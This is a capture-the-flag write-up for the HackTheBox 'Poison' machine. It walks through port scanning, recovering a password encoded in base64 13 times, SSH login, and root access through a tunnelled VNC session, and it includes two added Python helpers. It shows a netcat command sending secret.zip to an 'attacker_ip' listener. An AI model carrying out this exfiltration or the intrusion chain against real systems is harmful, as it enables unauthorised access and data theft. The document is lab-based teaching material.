HackTheBox – Poison Writeup

The Poison machine on HackTheBox retired today, and I will explain how I solved it. This box was one of the earlier machines I attempted, and it is a fairly easy one to crack.

Let's begin our enumeration with an Nmap scan.

nmap -sC -sV 10.10.10.84 -T4

Nmap scan report for 10.10.10.84
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

The Nmap scan shows two open ports, 22 (SSH) and 80 (HTTP). With nothing else exposed, it makes sense to start our enumeration with the web server.

On navigating to http://10.10.10.84, we find a simple portal which displays:

Temporary website to test local .php scripts.

Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php


listfiles.php looks the most interesting, so let's navigate to it.

http://10.10.10.84/listfiles.php

We are greeted with the following content:

Array( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt)

Again, pwdbackup.txt looks interesting. Let's navigate to it:

http://10.10.10.84/pwdbackup.txt

It displays:

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..
The text that follows the message looks like base64 (the character set and the trailing = padding give it away), so, as the hint says, we decode it repeatedly, thirteen times in total.

Final decoded value: Charix!2#4%6&8(0
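The repeated decoding, as an added Python example that is not part of the original writeup: it peels base64 layers off until the data stops looking like base64 or stops being printable text, and reports how many layers it removed, so it also handles backups with a different (or unknown) number of layers. Since the blob from pwdbackup.txt is not reproduced above, the sample input is constructed here by encoding the recovered password 13 times.

```python
import base64
import binascii
import re

# Strict base64 alphabet with optional '=' padding; whitespace is stripped before matching.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def looks_printable(data: bytes) -> bool:
    """True if every byte is printable ASCII or ordinary whitespace."""
    return all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def peel_base64(blob: bytes, max_layers: int = 64):
    """Repeatedly base64-decode until the data is no longer base64.

    Stops when the current layer does not match the base64 alphabet, when
    decoding fails, or when the decoded bytes are not printable text (a sign
    that we decoded one layer too far, e.g. a plaintext password that happens
    to be a valid base64 string). Returns (plaintext, layers_removed).
    """
    data = blob
    layers = 0
    while layers < max_layers:
        stripped = b"".join(data.split())  # backups often wrap long lines
        if not B64_RE.match(stripped) or len(stripped) % 4 != 0:
            break
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not looks_printable(decoded):
            break
        data = decoded
        layers += 1
    return data, layers


def nest_base64(plaintext: bytes, layers: int) -> bytes:
    """Apply base64 encoding `layers` times (used only to build the sample input)."""
    data = plaintext
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


# Constructed sample: the password recovered above, encoded 13 times, standing in
# for the blob in pwdbackup.txt (which is not reproduced in this writeup).
SAMPLE_BLOB = nest_base64(b"Charix!2#4%6&8(0", 13)

if __name__ == "__main__":
    plaintext, layers = peel_base64(SAMPLE_BLOB)
    print(f"removed {layers} base64 layer(s): {plaintext.decode()}")
```

The printable-text check is what makes the loop safe to run blind: a password such as "password" is itself a valid base64 string, and without that check the loop would decode it into binary garbage and report one layer too many.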

This looks like a password, and the name embedded in it suggests the username is charix.

Let's use these credentials to connect through SSH.

ssh charix@10.10.10.84

charix@Poison:~ % whoami
charix

And we are in!

Grab the user flag and let's continue our enumeration.

charix@Poison:~ % ls
secret.zip user.txt

We find an interesting file named secret.zip, which is password protected. For some reason I was unable to unzip it on the remote machine, so I copied the file to my local machine using netcat:

on our local machine: nc -nlvp 1234

on the victim machine: nc -w 3 -nv attacker_ip 1234 < secret.zip

A netcat transfer gives no confirmation that every byte arrived, so compare a checksum on both sides first (sha256 secret.zip on FreeBSD, sha256sum secret.zip locally). Then unzip the archive using the same password that was used for SSH: unzip secret.zip

The archive contains a single file named secret. While looking around, we also find that a VNC server is running as root on the victim machine:

charix@Poison:~ % ps -aux | grep root

<<snipped>>

root 529 0.0 0.7 23620 7148 v0- I Mon05 0:00.14 Xvnc :1 -deskto
root 540 0.0 0.3 67220 3288 v0- I Mon05 0:00.04 xterm -geometry

<<snipped>>

charix@Poison:~ % netstat -a

<<snipped>>

tcp4 0 0 localhost.5801 *.* LISTEN
tcp4 0 0 localhost.5901 *.* LISTEN

<<snipped>>

The Xvnc :1 process listens on port 5901 (5900 plus the display number); 5801 is its companion HTTP port. Both are bound to localhost only, so they cannot be reached from outside and we have to use local port forwarding to connect.

Let's create an SSH tunnel to forward the VNC port to our machine.

In one terminal:

ssh -L 2345:localhost:5901 charix@10.10.10.84

Once connected, leave the session open (minimize the terminal, or add -N to the ssh command so it only forwards the port without starting a shell).

This command instructs ssh to listen on port 2345 on our local machine; whatever connects to port 2345 on our machine is forwarded through the SSH tunnel to port 5901 on the server (the Poison machine).

Note that localhost here does not refer to our own machine: the destination host:port in -L is resolved on the server side, so localhost means the Poison machine itself.

Now, in a new terminal, let's connect to the VNC server, passing the extracted secret file as the password file (-passwd expects a vncpasswd-format file, which is exactly what secret is):

vncviewer 127.0.0.1::2345 -passwd secret
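Before launching vncviewer, it is worth confirming that what sits at the far end of the tunnel really is a VNC server and that it asks for VNC Authentication, which is what the secret password file satisfies. The following is an added Python example, not part of the original writeup: it performs the first RFB handshake messages through the forwarded port and reports the protocol version and the security types the server offers. The host and port default to the 127.0.0.1:2345 tunnel above; the parsing functions are exercised on constructed handshake bytes.

```python
import socket
import struct

# RFB security types from RFC 6143 plus common registered values.
SECURITY_TYPES = {
    1: "None",
    2: "VNC Authentication",
    5: "RA2",
    16: "Tight",
    18: "TLS",
    19: "VeNCrypt",
}


def parse_rfb_version(banner: bytes):
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n' -> (3, 8)."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or not banner.endswith(b"\n"):
        raise ValueError(f"not an RFB banner: {banner!r}")
    major, minor = banner[4:11].split(b".")
    return int(major), int(minor)


def parse_security_types(payload: bytes):
    """Parse the RFB 3.7/3.8 SecurityTypes message.

    Format: u8 count, then `count` u8 type values. A count of 0 means the server
    refused the connection and a u32 length plus reason string follows.
    """
    if not payload:
        raise ValueError("empty SecurityTypes message")
    count = payload[0]
    if count == 0:
        (reason_len,) = struct.unpack("!I", payload[1:5])
        reason = payload[5:5 + reason_len].decode("utf-8", errors="replace")
        raise ConnectionError(f"server refused connection: {reason}")
    types = payload[1:1 + count]
    if len(types) != count:
        raise ValueError("truncated SecurityTypes list")
    return [SECURITY_TYPES.get(t, f"unknown({t})") for t in types]


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise (RFB messages are fixed-layout, so short reads matter)."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def probe_vnc(host: str = "127.0.0.1", port: int = 2345, timeout: float = 5.0):
    """Run the RFB handshake up to the security negotiation and report what the server offers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        version = parse_rfb_version(recv_exact(s, 12))
        # Echo the server's version back to select it.
        s.sendall(b"RFB %03d.%03d\n" % version)
        if version < (3, 7):
            # RFB 3.3 sends a single u32 security type instead of a list.
            (sec,) = struct.unpack("!I", recv_exact(s, 4))
            return {"version": version, "security": [SECURITY_TYPES.get(sec, f"unknown({sec})")]}
        count = recv_exact(s, 1)
        if count[0] == 0:
            length = recv_exact(s, 4)
            reason = recv_exact(s, struct.unpack("!I", length)[0])
            payload = count + length + reason
        else:
            payload = count + recv_exact(s, count[0])
        return {"version": version, "security": parse_security_types(payload)}


if __name__ == "__main__":
    # Assumes the ssh -L 2345:localhost:5901 tunnel above is open.
    print(probe_vnc())
```

If the probe reports "VNC Authentication" and nothing else, the 8-byte secret file is the only credential the server will accept, and vncviewer with -passwd is the right tool; a server offering "None" would need no password at all.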

We get a VNC session as root! Grab the root.txt flag and keep pwning!

stay tuned for more write ups. Have a wonderful day ahead! 🙂